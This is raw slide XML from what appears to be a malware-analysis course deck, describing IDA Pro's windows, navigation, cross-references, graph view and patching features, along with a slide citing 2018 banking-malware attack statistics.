              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Save to *.</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>idb</a:t>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Plug-in</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-107950" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1367" name="Google Shape;1367;p149"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3275856" y="4149080"/>
            <a:ext cx="5884235" cy="2701376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1368" name="Google Shape;1368;p149"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6876256" y="0"/>
            <a:ext cx="2243473" cy="110434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5"/>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Security reports</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="Google Shape;196;p15"/>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Banking malware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>2018: 830 135 users attacked (steal money from bank accounts on the computers)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="197" name="Google Shape;197;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1545276" y="2533157"/>
            <a:ext cx="6123068" cy="3540864"/>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50"/>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IDA Pro</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1375" name="Google Shape;1375;p150"/>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GB"/>
              <a:t>Disassembly Windows</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Text – mode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>GUI with arrow (solid, dashed, facing up/down, …)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="555"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Other Windows</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Hex View</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Functions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: all functions with length and flags (R, F, L, S, etc.)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Names</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: every addresses with a name (functions, name coded, named data, strings)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: all strings</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Imports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: all imports</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Exports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: all exports</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Structures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: layout of all active data structures</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Enums: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>all enumerated data type</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-121284" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-121284" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-121284" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1376" name="Google Shape;1376;p150"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6876256" y="0"/>
            <a:ext cx="2243473" cy="1104345"/>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151"/>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IDA Pro</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1382" name="Google Shape;1382;p151"/>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000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Navigating</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Link: double-click</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Cross-reference: XREF</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Exploring history: 🡺Forward/ 🡸 Backward buttons</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Navigation band: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Light Blue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Red</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dark Blue</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Jump: address, name, function, etc.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Search</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Next Code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Text</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Sequence of Bytes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>…..</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1383" name="Google Shape;1383;p151"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6876256" y="0"/>
            <a:ext cx="2243473" cy="110434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152"/>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IDA Pro</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1390" name="Google Shape;1390;p152"/>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Cross references - Xrefs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Code Xrefs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Data Xrefs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Analysing Functions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1391" name="Google Shape;1391;p152"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="3428999"/>
            <a:ext cx="8280761" cy="3400425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1392" name="Google Shape;1392;p152"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6876256" y="0"/>
            <a:ext cx="2243473" cy="110434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153"/>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IDA Pro</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1398" name="Google Shape;1398;p153"/>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Graph</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1399" name="Google Shape;1399;p153"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3707904" y="1268760"/>
            <a:ext cx="2133466" cy="426692"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1400" name="Google Shape;1400;p153"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="2348881"/>
            <a:ext cx="8475654" cy="3651506"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1401" name="Google Shape;1401;p153"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6876256" y="0"/>
            <a:ext cx="2243473" cy="110434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154"/>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IDA Pro</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1408" name="Google Shape;1408;p154"/>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Patching</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>IDA Pro allows to put comments, rename variables, etc.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Rename functions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Rename variables</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Comments</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
